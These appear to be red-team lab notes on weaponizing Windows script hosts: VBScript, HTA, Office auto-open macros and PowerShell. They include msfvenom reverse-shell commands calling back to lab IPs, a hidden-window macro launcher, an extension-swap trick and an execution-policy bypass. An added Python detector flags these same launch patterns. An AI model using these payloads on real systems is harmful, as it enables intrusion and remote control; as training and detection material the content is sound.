☣️Weaponization
Visual Basic Scripts
cscript.exe = CLI scripts
wscript.exe = UI scripts
Both execute Microsoft Visual Basic Scripts (VBScript) (.vbs, .vbe).
Example Script - Message Box:
    Dim message
    message = "Hello from the Red Team"
    MsgBox message
Example Script - Run Calc:
    Set shell = WScript.CreateObject("Wscript.Shell")
    ' Run arguments: command, window style (0 = hidden), wait for exit (True)
    shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
Example - Run Script as .txt if .vbs is blocked:
    c:\Windows\System32>wscript /e:VBScript c:\Users\thm\Desktop\payload.txt
HTML App (HTA)
mshta executes .hta files
Example - ActiveXObject Payload:
    var c = 'cmd.exe';
    new ActiveXObject('WScript.Shell').Run(c);
Create HTA payload - Reverse Shell:
    $ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o thm.hta
or use msfconsole: exploit/windows/misc/hta_server
Visual Basic App (VBA)
Microsoft Office Macros
Word = Document_Open()
Excel = Workbook_Open()
Example - Auto-Open Message Box:
    Sub Document_Open()
      THM
    End Sub

    Sub AutoOpen()
      THM
    End Sub

    Sub THM()
      MsgBox ("Hi from the Red Team")
    End Sub
Example - Auto-Open Calc:
    Sub Document_Open()
      THM
    End Sub

    Sub AutoOpen()
      THM
    End Sub

    Sub THM()
      Dim payload As String
      payload = "calc.exe"
      ' Second argument 0 = hidden window
      CreateObject("Wscript.Shell").Run payload,0
    End Sub
Create VBA payload - Reverse Shell:
    $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.159.15 LPORT=443 -f vba
PowerShell (PSH)
Example - Bypass restrictions (execution policy):
    powershell -ex bypass -File payload.ps1
PowerShell Reverse Shell:
    $ git clone https://github.com/besimorhino/powercat.git
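Detection side - added example, not part of the original notes: a triage function that flags process-creation events matching the launch patterns above (wscript /e: on a non-script extension, mshta, powershell -ex bypass, Office spawning an interpreter). The rule names, the function names and the sample events are assumptions constructed for illustration.

```python
# Added example: triage rules for process-creation events (constructed data).
import ntpath

OFFICE = {"winword.exe", "excel.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
INTERPRETERS = SCRIPT_HOSTS | {"mshta.exe", "powershell.exe", "cmd.exe"}
NATIVE_EXT = {".vbs", ".vbe", ".js", ".jse", ".wsf"}

def exe_name(path):
    name = ntpath.basename(path.strip('"')).lower()
    return name if name.endswith(".exe") else name + ".exe"

def findings(parent, cmdline):
    """Return rule names triggered by one event. Splits on whitespace, so
    quoted paths containing spaces are out of scope for this sketch."""
    tokens = cmdline.split()
    image, args = exe_name(tokens[0]), [t.lower() for t in tokens[1:]]
    hits = []
    if image in SCRIPT_HOSTS:
        # /e:<engine> (or //e:) picks the engine regardless of file extension
        forced = any(a.startswith("/") and a.lstrip("/").startswith("e:") for a in args)
        scripts = [a for a in args if not a.startswith("/")]
        if forced and any(ntpath.splitext(s)[1] not in NATIVE_EXT for s in scripts):
            hits.append("script-host-engine-override")
    if image == "mshta.exe":
        hits.append("mshta-execution")
    if image == "powershell.exe":
        for flag, value in zip(args, args[1:]):
            name = flag.lstrip("-/")
            # PowerShell accepts -ep and any prefix of -ExecutionPolicy (e.g. -ex)
            is_policy = name == "ep" or (len(name) >= 2 and "executionpolicy".startswith(name))
            if flag[:1] in "-/" and is_policy and value == "bypass":
                hits.append("powershell-policy-bypass")
    if exe_name(parent) in OFFICE and image in INTERPRETERS:
        hits.append("office-spawned-interpreter")
    return hits

# Constructed sample events: (parent image, child command line)
SAMPLES = [
    ("explorer.exe", r"wscript /e:VBScript c:\Users\thm\Desktop\payload.txt"),
    ("explorer.exe", r"wscript.exe C:\Scripts\logon.vbs"),
    ("explorer.exe", r"mshta.exe C:\Users\thm\Downloads\thm.hta"),
    (r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "powershell -ex bypass -File payload.ps1"),
    ("services.exe", r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Ops\backup.ps1"),
]

if __name__ == "__main__":
    for parent, cmd in SAMPLES:
        print(findings(parent, cmd) or ["clean"], "<-", cmd)
```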